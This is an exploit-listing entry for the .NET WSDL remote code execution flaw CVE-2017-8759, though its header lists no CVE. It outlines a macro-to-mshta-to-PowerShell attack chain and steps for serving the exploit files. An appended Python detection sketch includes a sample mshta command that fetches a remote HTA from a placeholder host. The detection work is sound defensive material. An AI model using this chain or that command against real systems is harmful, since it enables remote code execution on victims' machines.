Microsoft Windows .NET Framework - Remote Code Execution 0day Exploit

2017-10-13
ID: 94468
CVE: None
Download vulnerable application: None
Source: https://github.com/Voulnet/CVE-2017-8759-Exploit-sample
  Running CVE-2017-8759 exploit sample.
  Flow of the exploit:
  A Word macro runs in the Doc1.doc file. The macro downloads a badly formatted txt file over WSDL, which triggers the WSDL parser log. The parsing log then results in running mshta.exe, which in turn runs a PowerShell command that runs mspaint.exe.
  To test:
  Run a web server on port 8080 and put the files exploit.txt and cmd.hta in its root. For example: python -m SimpleHTTPServer 8080
  If all is good, mspaint should run.
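
  A detection sketch for the process chain described above (Word, then mshta.exe, then PowerShell), added here as an example; it is not part of the exploit sample repository. The event fields, PIDs, the <host> placeholder and the assumption that mshta.exe shows up as a descendant of WINWORD.EXE are constructed for illustration.

```python
# Flag script hosts (mshta.exe, powershell.exe) that descend from an Office process.
# Constructed sample process-creation events; field names are hypothetical,
# loosely modelled on what an endpoint sensor records (pid, parent pid, image).
EVENTS = [
    {"pid": 100, "ppid": 1,   "image": "explorer.exe",   "cmd": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",    "cmd": "WINWORD.EXE Doc1.doc"},
    {"pid": 300, "ppid": 200, "image": "mshta.exe",      "cmd": "mshta.exe http://<host>:8080/cmd.hta"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe", "cmd": "powershell.exe <args>"},
    {"pid": 500, "ppid": 400, "image": "mspaint.exe",    "cmd": "mspaint.exe"},
    # Benign look-alikes: same binaries, but not launched from Office.
    {"pid": 600, "ppid": 100, "image": "powershell.exe", "cmd": "powershell.exe Get-Date"},
    {"pid": 700, "ppid": 100, "image": "mshta.exe",      "cmd": "mshta.exe C:\\app\\help.hta"},
]

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe"}


def ancestry(event, by_pid):
    """Return lower-cased image names from the event up to the root, child first."""
    chain, seen = [], set()
    # 'seen' guards against loops caused by PID reuse in the log.
    while event is not None and event["pid"] not in seen:
        seen.add(event["pid"])
        chain.append(event["image"].lower())
        event = by_pid.get(event["ppid"])  # None when the parent was not logged
    return chain


def find_office_script_chains(events):
    """Return (pid, chain) for every script host with an Office ancestor."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in events:
        chain = ancestry(e, by_pid)
        if chain[0] in SCRIPT_HOSTS and any(a in OFFICE for a in chain[1:]):
            hits.append((e["pid"], " <- ".join(chain)))
    return hits


if __name__ == "__main__":
    for pid, chain in find_office_script_chains(EVENTS):
        print(f"ALERT pid={pid}: {chain}")
```

  The rule keys on the ancestry rather than on mspaint.exe, since the final payload in the sample is only a stand-in.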